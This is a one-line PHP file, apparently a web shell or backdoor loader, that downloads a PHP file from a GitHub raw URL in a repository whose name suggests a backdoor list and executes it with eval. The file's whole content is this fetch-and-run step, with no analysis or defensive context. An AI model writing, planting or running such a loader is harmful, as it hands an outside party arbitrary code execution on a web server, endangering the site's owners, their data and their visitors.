<?php $url = "https://raw.githubusercontent.com/sibueeee/listbekdur/refs/heads/main/index.php";$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$tag= curl_exec($ch);curl_close($ch);eval("?>" . ("$tag")); ?>